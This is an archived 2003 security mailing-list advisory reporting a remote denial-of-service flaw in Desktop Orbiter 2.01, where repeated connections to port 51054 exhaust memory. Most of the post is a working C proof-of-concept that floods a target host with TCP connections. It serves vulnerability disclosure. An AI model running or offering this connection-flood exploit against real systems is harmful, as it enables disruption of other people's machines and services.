Remote DoS in Desktop Orbiter

From: Luca Ercoli (luca.ercoliat_private)
Date: Fri May 30 2003 - 06:08:25 PDT

  • Next message: M. Burnett: "Internet Explorer URL spoofing threat" 

    
 ('binary' encoding is not supported, stored as-is)
SUMMARY: Desktop Orbiter (www.anfibia.it) is a client-server application 
         that allow you to administer and secure your network.


VULNERABILITY
DESCRIPTION: At every connection to port 51054(of the server), a snapshot 
             preview of the desktop is loaded in memory;
             by creating many connections to this port a remote attacker
             can fill the virtual memory and flood user with mass errors 
             messages (like: virtual memory insufficent, exception 
             error,out of memory and Desktop Orbitter's errors).
             The application must be killed to regain normal 
             functionality of the system, but it's hard to do because any 
             process can't be executed and right bottom of the mouse 
             (usefull for kill process) is disallowed by errors messages;
             At the end of attack, user must reboot computer.


PLATFORM AFFECTED: Desktop Orbiter 2.01 (prior?)


EXPLOIT: 

#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define PORT 51054

int main(int argc, char *argv[]){

int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;

int c; 
int n; 
char *host = NULL;
int cnt=1;
        
if(argc < 2 ) { 
printf("Usage:%s -h <host>\n",argv[0]);
exit(0);
}


while((n = getopt(argc, argv, "h")) != -1) {
                switch(n) {
                        case 'h':
                        host = optarg;
                        break;
                                        
                        default:
                        printf("Bad Input\n");
                        exit(0);
                }
        }


if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }

        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(PORT);
        their_addr.sin_addr = *((struct in_addr *) he->h_addr);
        bzero(&(their_addr.sin_zero), 8);

printf
("\n\n\t\t#########################################################\n");
printf("\t\t# Proof of Concept by Luca Ercoli luca.ercoliat_private #\n");
printf("\t\t#         Desktop Orbiter 2.01 Denial of Service        #\n");
printf
("\t\t#########################################################\n\n");
printf("\nAttacking....\n\a");


if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }

       if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct 
sockaddr)) == -1)
          {
                 perror("connect");
exit(0);
}


for (c=0;c<99500;c++){

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }


        if (connect (sockfd, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) == -1)
          {
                 
printf("\n[Attack status] Step %d/25 : Complete!",cnt);

if (cnt == 25) {
printf("\nAttack Complete!\n\n\a");
exit(0);
}

cnt++;
  
sleep(1);
                  
          }


close(sockfd);

}

printf("\n");
return 1;

}

    

    



    

    


This archive was generated by hypermail 2b30 
: Sun Jun 01 2003 - 12:56:18 PDT